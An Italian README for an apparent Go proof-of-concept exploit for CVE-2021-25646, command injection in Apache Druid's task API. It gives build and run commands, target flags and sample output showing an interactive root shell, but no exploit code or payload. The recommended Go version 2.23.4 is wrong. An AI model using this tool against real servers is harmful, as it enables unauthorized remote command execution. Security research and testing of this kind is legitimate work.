
Una prova di concetto per la CVE-2021-25646, che consente l'iniezione di comandi
Questo repository contiene un exploit proof-of-concept (PoC) per CVE-2021-25646, una vulnerabilità critica di esecuzione di codice remoto in Apache Druid.
L'exploit è scritto in Go e consente l'iniezione interattiva di comandi tramite terminale.
È necessario avere Go installato (versione 2.23.4 consigliata).
go build .
Questo produrrà un binario nella directory corrente.
È possibile eseguire l'exploit sia compilando il binario che direttamente con go run.
-i : Indirizzo IP del server Druid di destinazione (obbligatorio)-p : Porta del server Druid di destinazione (obbligatoria)-proxy : Specifica l'URL del proxy (opzionale)Esecuzione del binario compilato:
./cve -i 127.0.0.1 -p 8888
Oppure esecuzione diretta con Go:
go run main.go -i 127.0.0.1 -p 8888
$ ./cve -i 127.0.0.1 -p 8888
~ $ whoami
root
~ $ uname -a
Linux druid-server 4.15.0-123-generic #126-Ubuntu SMP ...
Vulnerabilità:
L'exploit sfrutta una convalida dell'input inadeguata nel componente indexer di Druid, in particolare nell'API task, consentendo l'iniezione di comandi tramite payload JSON appositamente predisposti.
Riferimenti:
Questo software è fornito a solo scopo educativo.
L'autore non si assume alcuna responsabilità per qualsiasi uso improprio o danno causato da questo codice.
Ottenere sempre la giusta autorizzazione prima di testare qualsiasi sistema.